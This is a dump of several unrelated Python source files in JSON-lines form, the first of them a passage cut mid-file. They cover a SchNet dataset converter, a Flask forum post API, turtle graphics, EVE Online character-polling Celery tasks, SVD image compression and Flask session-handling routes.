read_dataset(path,numberofgeoms,filename):\n\n atom_buffer = []\n property_buffer = []\n charge_buffer = []\n metadata = {}\n for geom in range(1,1+numberofgeoms):\n\n #Geometry and Atomtypes\n xyz_file = open(path+\"/xyz-files/%07d.xyz\"%geom,\"r\").readlines()\n charge = int(xyz_file[1].split()[2])\n natom = int(xyz_file[0].split()[0])\n E=[]\n R=np.zeros((natom,3))\n for iatom in range(natom):\n E.append(xyz_file[iatom+2].split()[0])\n for xyz in 
range(3):\n R[iatom][xyz] = float(xyz_file[iatom+2].split()[1+xyz])/Bohr\n atoms = Atoms(E,R)\n\n #Properties\n prop_file = open(path+\"/properties/%07d\"%geom,\"r\").readlines()\n singlets = 0\n doublets = 0\n triplets = 0\n quartets = 0\n _energy = False\n energy = np.zeros((1))\n _soc = False\n soc = np.zeros((1))\n _force = False\n force = np.zeros((1))\n _dipole = False\n dipole = np.zeros((1))\n _nac = False\n nac = np.zeros((1))\n _dyson = False\n property_matrix=False\n dyson = np.zeros((1))\n property_list=[]\n for line in prop_file:\n if line.startswith(\"Singlets\"):\n singlets = int(line.split()[1])\n elif line.startswith(\"Doublets\"):\n doublets = int(line.split()[1])\n elif line.startswith(\"Triplets\"):\n triplets = int(line.split()[1])\n elif line.startswith(\"Quartets\"):\n quartets = int(line.split()[1])\n elif line.startswith(\"Energy\"):\n if int(line.split()[-1])==int(1):\n _energy = True\n property_list.append('energy')\n elif line.startswith(\"Dipole\"):\n if int(line.split()[-1])==int(1):\n _dipole = True\n property_list.append('dipoles')\n elif line.startswith(\"SOC\"):\n if int(line.split()[-1])==int(1):\n _soc = True\n property_list.append('socs')\n elif line.startswith(\"Grad\"):\n if int(line.split()[-1])==int(1):\n _force = True\n property_list.append('forces')\n property_list.append('has_forces')\n elif line.startswith(\"Given_grad\"):\n has_force=[]\n if int(line.split()[-1])==int(1):\n _has_forces = True\n has_force.append(1)\n property_list.append('has_forces')\n else:\n has_force.append(0)\n has_force=np.array(has_force)\n elif line.startswith(\"NAC\"):\n if int(line.split()[-1])==int(1):\n _nac = True\n property_list.append('nacs')\n elif line.startswith('DYSON'):\n if int(line.split()[-1])==int(1):\n _dyson = True\n property_list.append('dyson')\n else:\n continue\n nmstates = singlets + 2*doublets + 3*triplets + 4*quartets\n iline = -1\n for line in prop_file:\n iline+=1\n if line.startswith(\"! Energy\"):\n n_energy = singlets + doublets + triplets + quartets\n #int(line.split()[2])\n energy = [] #np.zeros((n_energy))\n eline = prop_file[iline+1].split()\n for i in range(singlets):\n energy.append(float(eline[i]))\n for i in range(singlets,singlets+doublets):\n energy.append(float(eline[i]))\n for i in range(singlets+2*doublets,singlets+2*doublets+triplets):\n energy.append(float(eline[i]))\n for i in range(singlets+2*doublets+3*triplets,singlets+2*doublets+3*triplets+quartets):\n energy.append(float(eline[i]))\n energy=np.array(energy)\n #dipole is read in as mu(1,1), mu(1,2), mu(1,3),...\n elif line.startswith(\"! Dipole\"):\n n_dipole = int((singlets*(singlets+1))/2+(doublets*(doublets+1))/2+(triplets*(triplets+1))/2+(quartets*(quartets+1))/2)\n dipole = np.zeros((n_dipole,3))\n dline = prop_file[iline+1].split()\n for i in range(n_dipole):\n for xyz in range(3):\n dipole[i][xyz] = float(dline[i+n_dipole*xyz])\n elif line.startswith(\"! SpinOrbitCoupling\"):\n n_soc = int(line.split()[2])\n soc = [] #np.zeros((n_soc))\n sline = prop_file[iline+1].split()\n for i in range(n_soc):\n soc.append(float(sline[i]))\n soc=np.array(soc)\n elif line.startswith(\"! 
Gradient\"):\n n_grad = int(line.split()[2])\n force = np.zeros((singlets+triplets+doublets+quartets,natom,3))\n index = -1\n gline = prop_file[iline+1].split()\n for istate in range(singlets+doublets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n index+=(natom*3*doublets)\n for istate in range(singlets+doublets,singlets+doublets+triplets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n index+=(2*natom*3*triplets)\n for istate in range(singlets+doublets+triplets,singlets+doublets+triplets+quartets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n #nonadiabatic couplings are also defined as vectors\n elif line.startswith(\"! Nonadiabatic coupling\"):\n n_nac = int(int(line.split()[3])/3/natom)\n #dimension: nstates(coupled), natoms,xyz(3)\n nac = np.zeros((n_nac,natom,3))\n nacline = prop_file[iline+1].split()\n index=-1\n for i in range(n_nac):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n nac[i][iatom][xyz] = float(nacline[index])\n elif line.startswith('! Dyson'):\n n_dyson = int(line.split()[-1])\n property_matrix = []\n sline = prop_file[iline+1].split()\n for i in range(n_dyson):\n property_matrix.append(float(sline[i]))\n property_matrix=np.array(property_matrix)\n else:\n continue\n\n available_properties = { 'energy' : energy,\n 'socs' : soc,\n 'forces' : force,\n 'has_forces': has_force,\n 'nacs' : nac,\n 'dipoles' : dipole,\n 'dyson' : property_matrix }\n #Append list \n charge_buffer.append(charge)\n atom_buffer.append(atoms)\n property_buffer.append(available_properties)\n #get schnet format\n metadata['n_singlets'] = int(singlets)\n metadata['n_doublets'] = int(doublets)\n metadata['n_triplets'] = int(triplets)\n metadata['n_quartets'] = int(quartets)\n states = ''\n for singlet in range(singlets):\n states += 'S '\n for dublet in range(2*doublets):\n states += 'D '\n for triplet in range(3*triplets):\n states += 'T '\n for quartet in range(4*quartets):\n states += 'Q '\n metadata['states'] = states\n reference = 'QC' # TODO put your method here\n phasecorrected = False\n metadata['phasecorrected'] = phasecorrected\n metadata['ReferenceMethod'] = reference\n spk_data = AtomsData(filename,available_properties=property_list)\n spk_data.add_systems(atom_buffer,property_buffer)\n #get metadata\n spk_data.set_metadata(metadata)\n\nif __name__ == \"__main__\":\n\n try:\n script, filename, natoms, filename = argv\n except IOError:\n print(\"USAGE: Script.py path_to_trainingset numberofgeometries filename\")\n\n#units should be atomic units always!\n#forces are -gradients!\npath = argv[1]\nnumberofgeoms = int(argv[2])\nfilename = str(argv[3])\n\nread_dataset(path,numberofgeoms,filename)\n","sub_path":"src/scripts/transform_dataset.py","file_name":"transform_dataset.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"493608932","text":"from api.tools.entities import posts, threads\nfrom flask import Blueprint, request\nimport json\nfrom api.helpers import choose_required, intersection, related_exists, get_json\nfrom api.tools.DBconnect import *\n\nmodule = Blueprint('post', __name__, url_prefix='/db/api/post')\n\n@module.route(\"/create/\", methods=[\"POST\"])\ndef create():\n con = connect()\n content = request.json\n required_data = [\"user\", \"forum\", 
\"thread\", \"message\", \"date\"]\n optional_data = [\"parent\", \"isApproved\", \"isHighlighted\", \"isEdited\", \"isSpam\", \"isDeleted\"]\n optional = intersection(request=content, values=optional_data)\n try:\n choose_required(data=content, required=required_data)\n post = posts.create(connect=con,date=content[\"date\"], thread=content[\"thread\"],\n message=content[\"message\"], user=content[\"user\"],\n forum=content[\"forum\"], optional=optional)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/details/\", methods=[\"GET\"])\ndef details():\n con = connect()\n content = get_json(request)\n required_data = [\"post\"]\n related = related_exists(content)\n try:\n choose_required(data=content, required=required_data)\n post = posts.details(con,content[\"post\"], related=related)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/list/\", methods=[\"GET\"])\ndef post_list():\n con = connect()\n content = get_json(request)\n try:\n identifier = content[\"forum\"]\n entity = \"forum\"\n except KeyError:\n try:\n identifier = content[\"thread\"]\n entity = \"thread\"\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n\n optional = intersection(request=content, values=[\"limit\", \"order\", \"since\"])\n try:\n p_list = posts.posts_list(connect=con,entity=entity, params=optional, identifier=identifier, related=[])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": p_list})\n\n\n@module.route(\"/remove/\", methods=[\"POST\"])\ndef remove():\n con = connect()\n content = get_json(request)\n required_data = [\"post\"]\n try:\n choose_required(data=content, required=required_data)\n post = posts.remove_restore(connect=con,post_id=content[\"post\"], status=1)\n threads.dec_posts_count(con,content[\"post\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/restore/\", methods=[\"POST\"])\ndef restore():\n con = connect()\n content = request.json\n required_data = [\"post\"]\n try:\n choose_required(data=content, required=required_data)\n threads.inc_posts_count(con,content[\"post\"])\n post = posts.remove_restore(connect=con,post_id=content[\"post\"], status=0)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/update/\", methods=[\"POST\"])\ndef update():\n con = connect()\n content = request.json\n required_data = [\"post\", \"message\"]\n try:\n choose_required(data=content, required=required_data)\n post = posts.update(connect=con,update_id=content[\"post\"], message=content[\"message\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/vote/\", methods=[\"POST\"])\ndef vote():\n con = connect()\n content = request.json\n required_data = [\"post\", \"vote\"]\n try:\n choose_required(data=content, required=required_data)\n post = 
posts.vote(connect = con,vote_id=content[\"post\"], vote_type=content[\"vote\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n","sub_path":"api/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162203032","text":"import turtle as t\nimport random as rnd\nimport math\n\ndef main():\n \"\"\"\n Draws randomly positioned radial patterns repeatedly\n \"\"\"\n width, height = setup()\n while True:\n x, y = get_random_coords(width, height)\n draw_radial(x, y)\n\n\ndef draw_radial(x, y):\n \"\"\"\n Draws a single instance of the radial pattern\n Number Number -> None\n \"\"\"\n DEGS_IN_CIRC = 360\n INCR_DEGS = 12\n stroke_color = 'green'\n t.goto(x, y)\n for angle in range(0, DEGS_IN_CIRC, INCR_DEGS):\n t.setheading(angle)\n fill_color = (math.cos(math.radians(angle)) + 1)/2\n draw_blade(stroke_color, fill_color)\n\n\ndef draw_blade(stroke_color, fill_color):\n \"\"\"\n Draws a single blade of the pattern\n Color Color -> None\n \"\"\"\n BOTTOM_EDGE = 200\n OUTER_EDGE = 50\n BOTTOM_TIP_ANGLE = 60\n TOP_TIP_ANGLE = 130\n TOP_EDGE = 230\n t.pd()\n t.fillcolor(fill_color, fill_color, fill_color)\n t.begin_fill()\n t.pencolor(stroke_color)\n t.forward(BOTTOM_EDGE)\n t.left(BOTTOM_TIP_ANGLE)\n t.forward(OUTER_EDGE)\n t.left(TOP_TIP_ANGLE)\n t.forward(TOP_EDGE)\n t.end_fill()\n t.pu()\n\ndef setup():\n \"\"\"\n Sets up the screen and returns width and height\n None -> Number Number\n \"\"\"\n BG_COLOR = (0.8, 0.95, 0.9)\n screen = t.getscreen()\n screen.bgcolor(BG_COLOR)\n width = screen.window_width()\n height = screen.window_height()\n t.shape(\"turtle\")\n t.delay(0)\n t.speed(\"fastest\")\n t.pu()\n return screen.window_width(), screen.window_height()\n\n\ndef get_random_coords(width, height):\n '''\n Returns random pixel positions within a screen area\n '''\n w = rnd.randint(0, width-1)\n h = rnd.randint(0, height-1)\n return w - width/2, h - height/2\n\n\nmain()","sub_path":"week06/02_radial_design_functions.py","file_name":"02_radial_design_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376823969","text":"import random\n\nimport requests\n\nfrom anoikis.api.eve.esi import characters as esi_characters\nfrom anoikis.api.exceptions import InvalidToken, ExpiredToken\n\nfrom apoptosis.models import session \nfrom apoptosis.models import UserModel, CharacterModel, CharacterLocationHistory, EVESolarSystemModel\nfrom apoptosis.models import CharacterCorporationHistory, EVECorporationModel, EVETypeModel, CharacterShipHistory\nfrom apoptosis.models import CharacterSkillModel, EVESkillModel\n\nfrom apoptosis.log import eve_log, job_log\n\nfrom apoptosis.eve.sso import refresh_access_token\n\nfrom datetime import datetime\n\nfrom apoptosis.queue.celery import celery_queue\n\n\ndef setup():\n job_log.info(\"user.setup\")\n\n for user in session.query(UserModel).all():\n setup_user(user)\n\ndef setup_user(user):\n job_log.debug(\"user.setup_user {}\".format(user))\n\n for character in user.characters:\n if character.refresh_token is not None:\n setup_character(character)\n\ndef setup_character(character):\n job_log.debug(\"user.setup_character {}\".format(character.character_name))\n\n refresh_character_location.apply_async(args=(character.id,), 
countdown=random.randint(0, 300))\n refresh_character_ship.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n refresh_character_corporation.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n refresh_character_skills.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_location(self, character_id, recurring=30):\n \"\"\"Refresh a characters current location.\"\"\"\n\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_location {}\".format(character.character_name))\n\n try:\n system_id = esi_characters.location(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n system_id = esi_characters.location(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n if system_id is not None:\n system_id = system_id[\"solar_system_id\"]\n system = EVESolarSystemModel.from_id(system_id)\n\n if len(character.location_history) and system.id == character.location_history[-1].system_id:\n # backoff\n if recurring < 300:\n recurring = recurring + 30\n else:\n recurring = 30\n\n history_entry = CharacterLocationHistory(character, system)\n eve_log.warn(\"{} moved to {}\".format(character.character_name, system.eve_name))\n session.add(history_entry)\n\n session.commit()\n\n if recurring:\n refresh_character_location.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_ship(self, character_id, recurring=60):\n \"\"\"Refresh a characters current ship.\"\"\"\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_ship {}\".format(character.character_name))\n\n try:\n type_id = esi_characters.ship(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n type_id = esi_characters.ship(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n\n if type_id is not None:\n item_id = type_id[\"ship_item_id\"]\n type_id = type_id[\"ship_type_id\"]\n\n eve_type = EVETypeModel.from_id(type_id)\n\n if len(character.ship_history) and character.ship_history[-1].eve_type == eve_type:\n # backoff\n if recurring <= 600:\n recurring = recurring + 60\n else:\n recurring = 60\n\n eve_log.warn(\"{} boarded {}\".format(character.character_name, eve_type.eve_name))\n\n history_entry = CharacterShipHistory(character, eve_type)\n history_entry.eve_item_id = item_id\n\n session.add(history_entry)\n\n session.commit()\n\n if recurring:\n refresh_character_ship.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_corporation(self, character_id, recurring=3600):\n try:\n character = 
session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_corporation {}\".format(character.character_name))\n\n corporation_id = esi_characters.detail(character.character_id)\n\n if corporation_id is not None:\n corporation_id = corporation_id[\"corporation_id\"]\n\n corporation = EVECorporationModel.from_id(corporation_id)\n\n if not len(character.corporation_history):\n # This character has no corp history at all\n session_entry = CharacterCorporationHistory(character, corporation)\n session_entry.join_date = datetime.now() # XXX fetch this from the actual join date?\n session.add(session_entry)\n session.commit()\n elif len(character.corporation_history) and character.corporation_history[-1].corporation is corporation:\n # Character is still in the same corporation as the last time we checked, we need to do nothing\n pass\n elif len(character.corporation_history) and character.corporation_history[-1].corporation is not corporation:\n # Character changed corporation, close the last one and create a new one\n previously = character.corporation_history[-1]\n previously.exit_date = datetime.now()\n\n currently = CharacterCorporationHistory(character, corporation)\n currently.join_date = datetime.now()\n \n session.add(currently)\n session.add(previously)\n\n session.commit()\n\n eve_log.warn(\"{} changed corporations {} -> {}\".format(\n character,\n previously.corporation,\n currently.corporation)\n )\n\n if recurring:\n refresh_character_corporation.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n self.retry(exc=e)\n\n@celery_queue.task(bind=True, ignore_result=True, default_retry_delay=60)\ndef refresh_character_skills(self, character_id, recurring=14400):\n try:\n character = session.query(CharacterModel).filter(CharacterModel.id==character_id).one()\n\n job_log.debug(\"user.refresh_character_skills {}\".format(character.character_name))\n\n try:\n skills = esi_characters.skills(character.character_id, access_token=character.access_token)\n except (InvalidToken, ExpiredToken):\n try:\n refresh_access_token(character)\n skills = esi_characters.skills(character.character_id, access_token=character.access_token)\n except:\n return job_log.warn(\"removing user.refresh_character_ship {}\".format(character.character_name))\n\n if skills and \"skills\" in skills: # XXX why can skills be None here?\n skills = skills[\"skills\"]\n\n for skill in skills:\n skill_id = skill[\"skill_id\"]\n\n eveskill = EVESkillModel.from_id(skill_id)\n\n session.add(eveskill)\n session.commit()\n\n skill_level = skill[\"current_skill_level\"]\n skill_points = skill[\"skillpoints_in_skill\"]\n\n characterskills = session.query(CharacterSkillModel).filter(\n CharacterSkillModel.character_id==character.id\n ).filter(\n CharacterSkillModel.eve_skill_id==eveskill.id\n ).all()\n\n # XXX why?\n for characterskill in characterskills:\n session.delete(characterskill)\n\n session.commit()\n\n characterskill = CharacterSkillModel(character)\n characterskill.eve_skill = eveskill\n characterskill.level = skill_level\n characterskill.points = skill_points\n\n session.add(characterskill)\n\n session.commit()\n\n if recurring:\n refresh_character_skills.apply_async(args=(character_id, recurring), countdown=recurring)\n except requests.exceptions.ConnectionError as e:\n 
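# --- illustrative sketch, not part of the apoptosis/queue/user.py record above ---
# Every task in that module follows the same polling shape: do one fetch, then
# re-schedule itself with apply_async(..., countdown=recurring), widening the
# interval while nothing changes and resetting it on a change. A minimal
# standalone version of the idea (celery_app and check_resource are assumed
# names, not from the original):
#
#   @celery_app.task(bind=True, ignore_result=True)
#   def poll_resource(self, resource_id, interval=60):
#       changed = check_resource(resource_id)  # hypothetical helper
#       interval = 60 if changed else min(interval + 60, 600)
#       poll_resource.apply_async(args=(resource_id, interval), countdown=interval)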
self.retry(exc=e)\n","sub_path":"apoptosis/queue/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":9406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"331992271","text":"import numpy as np\nimport matplotlib.image as mpi\nimport qr\nimport matplotlib.pyplot as plt\n\n\n\n# Split the matrix of an image into its three colour channels\n# img: the image matrix\n# returns the triple of RGB matrices\ndef split_colors(img):\n img_red = []\n img_green = []\n img_blue = []\n\n for i in range(len(img)):\n img_red.append([])\n img_green.append([])\n img_blue.append([])\n\n for j in range(len(img[0])):\n img_red[i].append(img[i][j][0])\n img_green[i].append(img[i][j][1])\n img_blue[i].append(img[i][j][2])\n\n return np.matrix(img_red), np.matrix(img_green), np.matrix(img_blue)\n\n\n# Clamp a colour value back into the valid range:\ndef color_around(x):\n if x < 0:\n return 0.\n if x > 1:\n return 1.\n return x\n\n\n# Build an image from red, green and blue matrices\ndef fusion_colors(red, green, blue):\n img_full = []\n\n for i in range(len(red)):\n img_full.append([])\n for j in range(len(red[0])):\n img_full[i].append([])\n img_full[i][j].append(color_around(red[i, j]))\n img_full[i][j].append(color_around(green[i, j]))\n img_full[i][j].append(color_around(blue[i, j]))\n\n return img_full\n\n\n# Turn a vector into a diagonal matrix\ndef vector_to_diag(v, n, m):\n d = np.zeros((n, m))\n\n for i in range(n):\n d[i, i] = v[0, i]\n\n return d\n\n\n# SVD decomposition with NumPy\n# k: number of singular values kept on the diagonal\ndef compression_with_numpy_svd(k, img_name):\n img_full = mpi.imread(img_name)\n red, green, blue = split_colors(img_full)\n\n u_red, s_red, v_red = np.linalg.svd(red)\n u_green, s_green, v_green = np.linalg.svd(green)\n u_blue, s_blue, v_blue = np.linalg.svd(blue)\n\n for i in range(k, len(img_full)):\n s_red[i] = 0\n s_green[i] = 0\n s_blue[i] = 0\n\n red_approx = np.matrix(u_red)*np.matrix(vector_to_diag(np.array([s_red]), len(u_red), len(v_red)))*np.matrix(v_red)\n green_approx = np.matrix(u_green)*np.matrix(vector_to_diag(np.array([s_green]), len(u_green), len(v_green)))*np.matrix(v_green)\n blue_approx = np.matrix(u_blue)*np.matrix(vector_to_diag(np.array([s_blue]), len(u_blue), len(v_blue)))*np.matrix(v_blue)\n\n img_full_approx = fusion_colors(np.array(red_approx), np.array(green_approx), np.array(blue_approx))\n\n #mpi.imsave(str(k) + img_name, np.array(img_full_approx))\n\n return error_in_compression(img_full, img_full_approx)\n\n# svd_numpy(5, \"p3_takeoff_base_square.png\")\n\ndef compression_with_our_svd(k, img_name):\n img_full = mpi.imread(img_name)\n red, green, blue = split_colors(img_full)\n\n u_red, s_red, v_red = qr.svd_with_numpy(red, 20)\n u_green, s_green, v_green = qr.svd_with_numpy(green, 20)\n u_blue, s_blue, v_blue = qr.svd_with_numpy(blue, 20)\n\n for i in range(k, len(img_full)):\n s_red[i] = 0\n s_green[i] = 0\n s_blue[i] = 0\n\n red_approx = np.dot(np.dot(np.matrix(u_red), np.matrix(vector_to_diag(s_red, len(u_red), len(v_red)))), np.matrix(v_red))\n green_approx = np.dot(np.dot(np.matrix(u_green), np.matrix(vector_to_diag(s_green, len(u_green), len(v_green)))), np.matrix(v_green))\n blue_approx = np.dot(np.dot(np.matrix(u_blue),np.matrix(vector_to_diag(s_blue, len(u_blue), len(v_blue)))),np.matrix(v_blue))\n\n img_full_approx = fusion_colors(np.array(red_approx), np.array(green_approx), np.array(blue_approx))\n\n #mpi.imsave(str(k) + img_name, 
np.array(img_full_approx))\n return error_in_compression(img_full, img_full_approx)\n#compression_with_our_svd(50, \"p3_takeoff_base_square.png\")\n\n\ndef error_in_compression(A, B):\n sum = 0\n for i in range(len(A)):\n for j in range(len(A[0])):\n for k in range(len(A[0, 0])):\n sum += ((B[i][j][k] - A[i][j][k]) ** 2)\n\n return np.sqrt(sum)\n\ndef plot_error():\n errors1 = []\n errors2 = []\n k_list = range(200)\n\n print(\"Plotting errors while compressing, this step can take a while...\")\n\n for k in k_list:\n errors1.append(compression_with_our_svd(k, \"p3_takeoff_base_square.png\"))\n errors2.append(compression_with_numpy_svd(k, \"p3_takeoff_base_square.png\"))\n\n plt.plot(k_list, errors1)\n plt.plot(k_list, errors2)\n plt.show()\n\nplot_error()\n\n\n\n","sub_path":"image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"431726810","text":"\"\"\"\nRoutes and views for the flask application.\n\"\"\"\n#import logging\n#from __future__ import unicode_literals\n#import sqlite3\n#from flask_paginate import Pagination, get_page_args\n#import click\n#click.disable_unicode_literals_warning = True\n\n\nfrom datetime import datetime\nfrom datetime import timedelta\n#import time\n#import googlemaps\n#from datetime import datetime\n\nimport requests\n#import json\n\n#from flask import Flask\nfrom flask import flash\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\n#from flask import url_for\nfrom flask import session\nfrom flask import g, current_app\n\n#from flask import logging\n#from flask import jsonify\nfrom flask_login import current_user, login_required #, login_user, logout_user\n\n# Import the app object from the main app module __INIT__\nfrom . 
import app\n\n# Import module forms\nfrom .module_authorization.forms import LoginForm, RegistrationForm, ContactUsForm, forgetPasswordForm\nfrom .forms import CookiesConsentForm\n#from .models import Visit, VisitPoint, Page_Visit\n#from sqlalchemy import func\nfrom .external_services.log_services import set_geolocation, client_IP, log_visit, log_page, log_route, log_splash_page, log_info, log_variable, RealClientIPA\nfrom .external_services.token_services import generate_unique_sessionID\nfrom .debug_services.debug_log_services import *\n\n###########################################################################\n###########################################################################\n###########################################################################\n### functions\n###########################################################################\n###########################################################################\n###########################################################################\n##########################################\n#put this after @ decorator\n##########################################\n#how to get a config variable app.config.get('RECAPTCHA_PRIVATE_KEY'))\n#how to get a config variable app.config.get('RECAPTCHA_PUBLIC_KEY'))\n#request.method: GET\n#request.url: http://127.0.0.1:5000/alert/dingding/test?x=y\n#request.base_url: http://127.0.0.1:5000/alert/dingding/test\n#request.url_charset: utf-8\n#request.url_root: http://127.0.0.1:5000/\n#str(request.url_rule): /alert/dingding/test\n#request.host_url: http://127.0.0.1:5000/\n#request.host: 127.0.0.1:5000\n#request.script_root:\n#request.path: /alert/dingding/test\n#request.full_path: /alert/dingding/test?x=y\n#request.args: ImmutableMultiDict([('x', 'y')])\n#request.args.get('x'): y\n#varPageName = request.args.get('url')\n#alert(varPageName)\n###########################################################################\n###########################################################################\n###########################################################################\n### define the routes, accepted methods (GET/POST) and the service function\n###########################################################################\n###########################################################################\n###########################################################################\n#app.secret_key = '/r/xd8}q/xde/x13/xe5F0/xe5/x8b/x96A64/xf2/xf8MK/xb1/xfdA7x8c'\n#############################################################\n#############################################################\n#############################################################\n@app.teardown_request\ndef teardown(error):\n if hasattr(g, 'conn'):\n print('TEARDOWN !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!',error)\n g.conn.close()\n\n@app.before_first_request\ndef init_cookies_etc_before_first_request():\n log_module_start('@app.before_first_request')\n log_info('SITE FIRST REQUEST !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n\n #this will make session cookies expired in 5 minutes\n #set app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=5)\n #session.permanent = True\n\n #1. 
init session cookies\n log_info('init session cookies')\n\n session['active_module'] = __name__\n session['urls'] = []\n session['pages'] = []\n clientIPA = client_IP()\n session['clientIPA'] = clientIPA\n session['visit'] = 0\n try:\n session['lastpageHTML'] = app.homepage_html\n except:\n session['lastpageHTML'] = 'page_templates/landing_page.html'\n session.modified = True\n\n #2. import splash forms objects\n log_info('init app (splash) forms')\n\n app.loginform = LoginForm()\n app.loginform.eyecatch.data = __name__\n app.registrationform = RegistrationForm()\n app.contactusform = ContactUsForm()\n app.forgetpasswordform = forgetPasswordForm()\n app.cookiesconsentform = CookiesConsentForm()\n log_variable('debug_log_services_eyecatch', debug_log_services_eyecatch)\n log_module_finish('@app.before_first_request')\n\n@app.before_request\ndef set_cookies_etc_before_request():\n if request.base_url.lower().find('/static/') >= 0 :\n return\n\n log_request_start(request.base_url)\n log_start('@app.before_request')\n\n log_info('save necessary cookies')\n\n session['active_module'] = __name__\n if not session.get('sessionID'):\n token = generate_unique_sessionID()\n session['sessionID'] = token\n log_variable('@@@ NEW SESSION @@@', session.get('sessionID'))\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60\n\n if 'identityDT' not in session:\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60\n #log_info('*** new session started', session.get('identityDT'), session.get('session_expiry'))\n\n if not session.get('visit'):\n session['visit'] = 100\n session['visit'] = session.get('visit') + 1\n session['visitpoint_try'] = 0\n\n if 'urls' not in session:\n session['urls'] = []\n if 'pages' not in session:\n session['pages'] = []\n if 'clientIPA' not in session:\n clientIPA = client_IP()\n session['clientIPA'] = clientIPA\n if session['clientIPA'] != RealClientIPA():\n clientIPA = RealClientIPA()\n session['clientIPA'] = RealClientIPA()\n \n log_info('check session expiry')\n\n strdt = session['identityDT']\n t1 = datetime.strptime(strdt, \"%Y-%m-%d %H:%M:%S\")\n t2 = datetime.now()\n duration = t2 - t1\n duration_sec = duration.total_seconds()\n session['session_expiry'] = duration_sec\n if duration_sec >= 60*60:\n dt = datetime.now()\n strdt = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n session['identityDT'] = strdt\n session['session_expiry'] = 60*60\n log_info('***session expired after 1 hour', duration_sec)\n app.logger.critical('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! SESSION EXPIRED !!! 
